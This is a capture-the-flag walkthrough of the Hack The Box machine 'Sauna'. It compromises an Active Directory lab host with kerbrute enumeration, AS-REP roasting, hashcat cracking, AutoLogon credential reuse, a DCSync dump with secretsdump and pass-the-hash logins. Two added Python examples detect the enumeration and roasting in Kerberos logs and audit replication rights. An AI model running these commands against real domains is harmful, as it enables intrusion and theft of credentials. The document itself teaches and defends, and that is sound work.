# HTB Sauna

## Getting a shell

### Port scan

```
$ nmap -p- -sV 10.129.95.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-04 02:54 CST
Nmap scan report for 10.129.95.180
Host is up (0.013s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-04 15:56:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
```

Port 80 runs IIS 10.0, but it is patched and nothing exploitable stands out.

SMB accepts anonymous login, but the share list cannot be enumerated:
```
$ smbclient -L 10.129.95.180
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

nxc reveals the domain name; add a hosts entry for it:
```
$ nxc smb 10.129.95.180
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
```

Query LDAP:
```
$ ldapsearch -x -H ldap://10.129.95.180 -b "dc=egotistical-bank,dc=local"
# ...
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
# ...
```

One user, Hugo Smith, stands out. Going back to the web service on port 80, the about page lists employee names:
```
Hugo Smith
Fergus Smith
Shaun Coins
Sophie Driver
Bowie Taylor
Hugo Bear
Steven Kerb
```

These give us candidate usernames to enumerate with kerbrute:
```
$ ./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.95.180
2026/03/04 04:38:56 > Using KDC(s):
2026/03/04 04:38:56 > 10.129.95.180:88
2026/03/04 04:38:57 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:00 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:00 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:04 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:23 > [+] VALID USERNAME: [email protected]
```

Following the naming pattern of the valid accounts (first initial plus surname), build the following user list and save it as users.txt:
```
administrator
hsmith
fsmith
scoins
sdriver
btaylor
hbear
skerb
```

Normally, Kerberos authentication requires the client to pre-authenticate to the DC before it gets a ticket. If a user account has UF_DONT_REQUIRE_PREAUTH set, the DC skips that step and returns the AS-REP, a blob encrypted with the user's password-derived key, to anyone who asks, and that blob can be cracked offline. GetNPUsers.py probes for such accounts:
```
$ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -dc-ip 10.129.95.180
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:affe1a644beb15b8651f129ff7bb681f$afa4ebe9839874cb3211e976bbb51b4db5462f1a54e7407a1150a25049fadb302d428739359999c5efeb277aefcb080f5a9daa6577916f768d7b07f6f64c16630abcb01a25b6f3a1961872884d9bafda89285fad8ccf7e4a8b5a5f111ac6b1e4c5895b4fd3dae89bbb2e4c80501ccfbd5bae1da229ee6652708741f175144bafe8cc7ef2af2252003735f5cdea5e4ff97855439229ea642574c5c35296a66b6541cdc24ec40a9b9dd492be6efb2e293d054f4ae6ba5b77990d19cefa2d507e6064ab5943d2b9d3a87ce8918bb28f8de78f881330b3cbb8d511a851a3732331af10233f5d2a022233c051e3c1c15eaa7bf315512ce2e3a8ea7ee031c43f646973
```

The account fsmith has the flag set. Save the hash to a file and crack it with hashcat:
```
$ hashcat hash /usr/share/wordlists/rockyou.txt
# ...
[email protected]:affe1a644beb15b8651f129ff7bb681f$afa4ebe9839874cb3211e976bbb51b4db5462f1a54e7407a1150a25049fadb302d428739359999c5efeb277aefcb080f5a9daa6577916f768d7b07f6f64c16630abcb01a25b6f3a1961872884d9bafda89285fad8ccf7e4a8b5a5f111ac6b1e4c5895b4fd3dae89bbb2e4c80501ccfbd5bae1da229ee6652708741f175144bafe8cc7ef2af2252003735f5cdea5e4ff97855439229ea642574c5c35296a66b6541cdc24ec40a9b9dd492be6efb2e293d054f4ae6ba5b77990d19cefa2d507e6064ab5943d2b9d3a87ce8918bb28f8de78f881330b3cbb8d511a851a3732331af10233f5d2a022233c051e3c1c15eaa7bf315512ce2e3a8ea7ee031c43f646973:Thestrokes23
# ...
```

The hash cracks to the password Thestrokes23.
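Both steps so far, the kerbrute username sweep and the AS-REP roast, leave Event ID 4768 (Kerberos TGT request) records on the domain controller, which is where a defender catches them. The following is an added example written for this page, not code from the writeup or from any of the tools it uses. The 4768 records are constructed sample data with made-up client addresses (10.10.14.5 as the attacker, 10.129.95.50 as a workstation); the field names and status codes are the documented Windows values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Event ID 4768 field values used below (documented Windows values).
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # no such account: what a username sweep mostly produces
KDC_ERR_PREAUTH_REQUIRED = "0x19"     # account exists, pre-auth needed, no ticket issued
SUCCESS = "0x0"
PREAUTH_NONE = "0"                    # PreAuthType 0: no pre-authentication was required
ETYPE_RC4 = "0x17"                    # RC4-HMAC: the cheapest AS-REP to crack offline


def _ev(time, user, ip, status, preauth, etype):
    """Build one constructed 4768 record using the event's own field names."""
    return {"time": time, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample data (not logs from the box): a sweep of unknown names from one
# client, one AS-REP issued without pre-auth, and ordinary workstation traffic.
SAMPLE_4768 = [
    _ev("2026-03-04T04:38:56", "aaron", "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff"),
    _ev("2026-03-04T04:38:57", "abbie", "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff"),
    _ev("2026-03-04T04:38:57", "admin1", "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff"),
    _ev("2026-03-04T04:38:58", "alex", "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff"),
    _ev("2026-03-04T04:38:59", "alice", "10.10.14.5", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff"),
    # a real account hit by the same sweep: the KDC answers "pre-auth required"
    _ev("2026-03-04T04:39:00", "hsmith", "10.10.14.5", KDC_ERR_PREAUTH_REQUIRED, "-", "0xffffffff"),
    # AS-REP roast: TGT issued with PreAuthType 0, RC4-encrypted
    _ev("2026-03-04T04:45:10", "fsmith", "10.10.14.5", SUCCESS, PREAUTH_NONE, ETYPE_RC4),
    # ordinary logon: encrypted-timestamp pre-auth (type 2), AES256 (0x12)
    _ev("2026-03-04T08:01:02", "hsmith", "10.129.95.50", SUCCESS, "2", "0x12"),
    # a single typo from a workstation is not a sweep
    _ev("2026-03-04T08:03:30", "hsmithh", "10.129.95.50", KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff"),
]


def detect_enumeration(events, window=timedelta(seconds=60), threshold=5):
    """Clients that requested TGTs for at least `threshold` distinct non-existent
    principals within `window`. Returns {client_ip: set_of_names}."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"].lower() == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            by_ip[e["IpAddress"]].append((datetime.fromisoformat(e["time"]), e["TargetUserName"]))
    hits = {}
    for ip, items in by_ip.items():
        items.sort()
        for start, _ in items:                       # slide the window over each start time
            names = {n for t, n in items if start <= t <= start + window}
            if len(names) >= threshold:
                hits[ip] = names
                break
    return hits


def detect_asrep_roast(events):
    """TGTs issued with no pre-authentication: the AS-REP was handed out on request,
    so its encrypted part can be brute-forced offline. Returns
    (user, client_ip, encryption_type) tuples; RC4 (0x17) is the worst case."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events
            if e["Status"].lower() == SUCCESS and e["PreAuthType"] == PREAUTH_NONE]


if __name__ == "__main__":
    for ip, names in detect_enumeration(SAMPLE_4768).items():
        print(f"possible username enumeration from {ip}: {sorted(names)}")
    for user, ip, etype in detect_asrep_roast(SAMPLE_4768):
        print(f"AS-REP issued without pre-auth for {user} to {ip} (etype {etype})")
```

On the sample data the sweep from 10.10.14.5 trips the enumeration rule while the lone typo from the workstation does not, and the fsmith ticket is the only one issued with PreAuthType 0. The fix on the account side is simply to clear the "Do not require Kerberos preauthentication" flag; the 4768 query above also doubles as a periodic audit for any account that still has it set.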
Log in with it over WinRM:

```
$ evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt
812a833eee294fe0cd35caa004723d4e
```

## Privilege escalation
Run BloodHound:

```
bloodhound-python -u fsmith -p Thestrokes23 -ns 10.129.95.180 -d EGOTISTICAL-BANK.LOCAL -c All --zip
```

Since we only control fsmith so far, nothing useful shows up.
Next, winPEAS:

```
# ...
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
# ...
```

It finds an AutoLogon credential, but logging in with it fails.

Check which users exist:
```
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
```

The stored username is simply wrong: the account is actually svc_loanmgr.
```
$ evil-winrm -i 10.129.95.180 -u svc_loanmgr -p Moneymakestheworldgoround!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
```

Logged in. Now run BloodHound again for this account.
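DCSync works only for principals that hold the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object, which is the edge BloodHound surfaces for an account like this. The following added example (written for this page, not code from the writeup or from BloodHound) audits an ACL for that condition: it nets out Allow and Deny ACEs, then lists every trustee outside a default allowlist that holds both rights. The ACL is constructed input, not data pulled from the box: svc_loanmgr is modeled on the account above, and backup-svc and svc_old are hypothetical names added to show the edge cases. The allowlist of default replicators is an assumption to adjust per domain.

```python
from collections import defaultdict

# Extended-right GUIDs from the AD schema (documented, well-known values).
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"           # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes-All
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"  # ...-Get-Changes-In-Filtered-Set
REPLICATION_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}

# Access-mask bits relevant here (ADS_RIGHTS_ENUM values).
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100   # "extended right"; the ACE's GUID says which one
ADS_RIGHT_GENERIC_ALL = 0x10000000

# Principals that hold replication rights on a default domain head. Assumption:
# adjust to the domain being audited.
DEFAULT_REPLICATORS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "BUILTIN\\Administrators",
    "EGOTISTICAL-BANK\\Domain Controllers",
    "EGOTISTICAL-BANK\\Enterprise Read-only Domain Controllers",
}


def ace(trustee, mask, object_type=None, ace_type="Allow"):
    """One ACE on the domain object: who, which access bits, which extended right."""
    return {"trustee": trustee, "mask": mask, "object_type": object_type, "type": ace_type}


# Constructed ACL on the domain object. backup-svc and svc_old are hypothetical.
DOMAIN_ACES = [
    ace("NT AUTHORITY\\SYSTEM", ADS_RIGHT_GENERIC_ALL),
    ace("EGOTISTICAL-BANK\\Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),
    ace("EGOTISTICAL-BANK\\Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_ALL),
    ace("EGOTISTICAL-BANK\\Enterprise Read-only Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),
    ace("EGOTISTICAL-BANK\\Enterprise Read-only Domain Controllers", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_FILTERED),
    ace("EGOTISTICAL-BANK\\Domain Users", 0x00000004 | 0x00000010),  # ListChildren | ReadProperty, harmless
    ace("EGOTISTICAL-BANK\\svc_loanmgr", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),
    ace("EGOTISTICAL-BANK\\svc_loanmgr", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_ALL),
    ace("EGOTISTICAL-BANK\\backup-svc", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),  # only half the pair
    ace("EGOTISTICAL-BANK\\svc_old", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),
    ace("EGOTISTICAL-BANK\\svc_old", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_ALL),
    ace("EGOTISTICAL-BANK\\svc_old", ADS_RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_ALL, ace_type="Deny"),
]


def _rights_in(a):
    """Replication rights a single ACE confers."""
    if a["mask"] & ADS_RIGHT_GENERIC_ALL:
        return set(REPLICATION_RIGHTS)
    if a["mask"] & ADS_RIGHT_DS_CONTROL_ACCESS:
        if a["object_type"] is None:          # control-access with no GUID = every extended right
            return set(REPLICATION_RIGHTS)
        if a["object_type"].lower() in REPLICATION_RIGHTS:
            return {a["object_type"].lower()}
    return set()


def replication_rights(aces):
    """Net replication rights per trustee. An explicit Deny cancels the matching Allow
    (a simplification: real evaluation also orders ACEs by inheritance)."""
    allowed, denied = defaultdict(set), defaultdict(set)
    for a in aces:
        (denied if a["type"] == "Deny" else allowed)[a["trustee"]] |= _rights_in(a)
    net = {t: r - denied[t] for t, r in allowed.items()}
    return {t: r for t, r in net.items() if r}


def dcsync_capable(aces, allowlist=frozenset(DEFAULT_REPLICATORS)):
    """Trustees outside the allowlist holding both Get-Changes and Get-Changes-All,
    the pair a DRSUAPI GetNCChanges call (what secretsdump.py uses) needs."""
    return sorted(t for t, r in replication_rights(aces).items()
                  if {GET_CHANGES, GET_CHANGES_ALL} <= r and t not in allowlist)


if __name__ == "__main__":
    for trustee in dcsync_capable(DOMAIN_ACES):
        print(f"non-default principal can replicate all secrets: {trustee}")
```

On the constructed ACL only svc_loanmgr is reported: backup-svc holds just one of the two rights, svc_old has the second one denied, and the read-only DC group holds Get-Changes plus the filtered-set right, which is not enough to pull password hashes. In a real domain the same check runs over the ACL read from the domain head (for example with ldap3 or PowerShell's Get-Acl on the AD: drive), and any hit outside the allowlist is either a documented exception (Azure AD Connect's account is a common one) or a finding to remove.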

It can DCSync:

```
$ secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:c64aecb288883c2668ecc6d332a820a0:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ff4a2dcede473f2bb313a3beee8484644123f7340ea2f45cc179774aaecf23fb
SAUNA$:aes128-cts-hmac-sha1-96:35fecbe71951682492e232db60abe044
SAUNA$:des-cbc-md5:911a8fc7ad3167d9
[*] Cleaning up...
```

Pass the Administrator NT hash to log in:
```
$ evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a56ed3980e14c834b97cf7982e2ad0ac
```

## Summary

Learned: the UF_DONT_REQUIRE_PREAUTH misconfiguration -> dump the AS-REP hash -> crack it offline; the DCSync attack; and several information-gathering methods.

License: CC BY 4.0